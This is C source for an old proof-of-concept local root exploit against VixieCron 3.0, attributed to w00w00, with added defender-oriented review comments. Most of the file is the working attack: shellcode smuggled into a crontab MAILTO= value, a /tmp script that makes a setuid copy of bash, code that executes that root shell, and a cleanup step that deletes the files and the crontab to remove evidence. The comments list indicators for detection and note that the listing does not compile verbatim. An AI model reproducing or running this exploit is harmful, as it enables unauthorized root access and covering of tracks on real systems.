
  1. /*
  2.  * VixieCron 3.0 Proof of Concept Exploit - w00w00
  3.  * 
  4.  * Not only does Paul give up root with this one, but with his creative use of
  5.  * strtok() he actually ends up putting the address of our shellcode in eip.  
  6.  * 
  7.  * Many Thanks: Cheez Wiz, Sangfroid
  8.  * Thanks: stran9er, Shok
  9.  * Props: attrition.org,mea_culpa,awr,minus,Int29,napster,el8.org,w00w00
  10.  * Drops: Vixie, happyhacker.org, antionline.com, <insert your favorite web \
  11.  *        defacement group here>
  12.  *        
  13.  * Hellos: pm,cy,bm,ceh,jm,pf,bh,wjg,spike.
  14.  * 
  15.  * -jbowie@el8.org
  16.  * 
  17.  */
  18.    
  19. #include <stdio.h>
  20. #include <sys/types.h>
  21. #include <sys/stat.h>
  22. #include <unistd.h>
  23. #include <pwd.h>
  24.  
/*
 * Payload bytes that main() writes into the crontab's MAILTO= value.
 * Two things in it are plain text and therefore useful as indicators:
 * the marker "w00w00:Ifwewerehackerswedownyourdumbass" and the path
 * "/tmp/w00w00", which main() populates with a helper script before the
 * crontab is installed.
 *
 * NOTE(review): the non-printable bytes look like 32-bit x86 Linux code
 * (a "\xb0\x0b\xcd\x80" int 0x80 sequence is present) — treat them as
 * opaque attacker-controlled data; nothing in this file decodes them.
 */
char shellcode[] =
        "\xeb\x40\x5e\x89\x76\x0c\x31\xc0\x89\x46\x0b\x89\xf3\xeb"
        "\x27w00w00:Ifwewerehackerswedownyourdumbass\x8d\x4e"
        "\x0c\x31\xd2\x89\x56\x16\xb0\x0b\xcd\x80\xe8\xbb\xff\xff"
        "\xff/tmp/w00w00";
  30.         
/*
 * Entry point.  Drives the proof of concept described in the file header:
 * writes a user crontab whose MAILTO= value carries the bytes of
 * `shellcode`, plants a helper script at /tmp/w00w00, installs the crontab
 * with /usr/bin/crontab, then polls until a copy of bash shows up in the
 * user's home directory and exec's it.
 *
 * Defender's view of the artifacts this leaves on a host, all taken from
 * the code below:
 *   - a user crontab whose first line is "MAILTO=" followed by 96 copies
 *     of "w00w00 " and then non-printable bytes, plus a "* * * * * date"
 *     entry (staged in a file named "cronny" in the home directory);
 *   - the script /tmp/w00w00 containing "cp /bin/bash <home>" and
 *     "chmod 4755 <home>/bash";
 *   - a mode-4755 "bash" in the home directory.
 * A cleanup child removes /tmp/w00w00, ./bash and ./cronny and runs
 * "crontab -r", so records of crontab invocations and of setuid-bit
 * changes are the durable evidence, not the files themselves.
 *
 * argc/argv are unused.  No return statement: each path either ends in
 * execl() or runs to the closing brace of main().
 *
 * NOTE(review): the listing as published has no "{" between the signature
 * and the declarations, so it does not compile verbatim.  The relevance
 * of the underlying cron defect is limited to the VixieCron 3.0 line named
 * in the header; confirm against the cron build in use before treating
 * this as a live risk.
 */
int
main(int argc,char *argv[])

        FILE *cfile,*tmpfile;   /* `tmpfile` shadows stdio's tmpfile() */
        struct stat sbuf;
        struct passwd *pw;
        int x;

        /* NOTE(review): pw is never NULL-checked; getpwuid() failure
         * would dereference NULL at chdir() below. */
        pw = getpwuid(getuid());

        /* Stage everything relative to the caller's home directory;
         * neither fopen() result is checked. */
        chdir(pw->pw_dir);
        cfile = fopen("./cronny","a+");
        tmpfile = fopen("/tmp/w00w00","a+");

        /* Build the crontab: an oversized MAILTO= value (96 x "w00w00 "
         * plus the payload bytes) and a minute-granularity entry so cron
         * processes it promptly. */
        fprintf(cfile,"MAILTO=");
        for(x=0;x<96;x++)
                fprintf(cfile,"w00w00 ");
        fprintf(cfile,"%s",shellcode);
        fprintf(cfile,"\n* * * * * date\n");
        fflush(cfile);

        /* Helper script referenced from the payload: copies /bin/bash into
         * the home directory and sets it setuid (4755). */
        fprintf(tmpfile,"#!/bin/sh\ncp /bin/bash %s\nchmod 4755 %s/bash\n", pw->pw_dir,pw->pw_dir);
        fflush(tmpfile);

        fclose(cfile),fclose(tmpfile);  /* comma operator: closes both */

        /* Execute bits only (0111); no read bits are set on the script. */
        chmod("/tmp/w00w00",S_IXUSR|S_IXGRP|S_IXOTH);

        if(!(fork())) {
                /* child: install the staged crontab */
                execl("/usr/bin/crontab","crontab","./cronny",(char *)0);
        } else {
                /* parent: poll every 5 s until ./bash exists in $HOME */
                printf("Waiting for shell be patient....\n");
                for(;;) {
                        if(!(stat("./bash",&sbuf))) {
                                        break;
                        } else { sleep(5); }
                }
                /* Second fork: the parent (non-zero pid) runs the copied
                 * bash; the child waits 5 s, then removes the staged files
                 * and the crontab. */
                if((fork())) {
                        printf("Thank you for using w00warez!\n");
                        execl("./bash","bash",(char *)0);
                } else {
                        remove("/tmp/w00w00");
                        sleep(5);
                        remove("./bash");
                        remove("./cronny");
                        execl("/usr/bin/crontab","crontab","-r",(char *)0);
                }
        }
}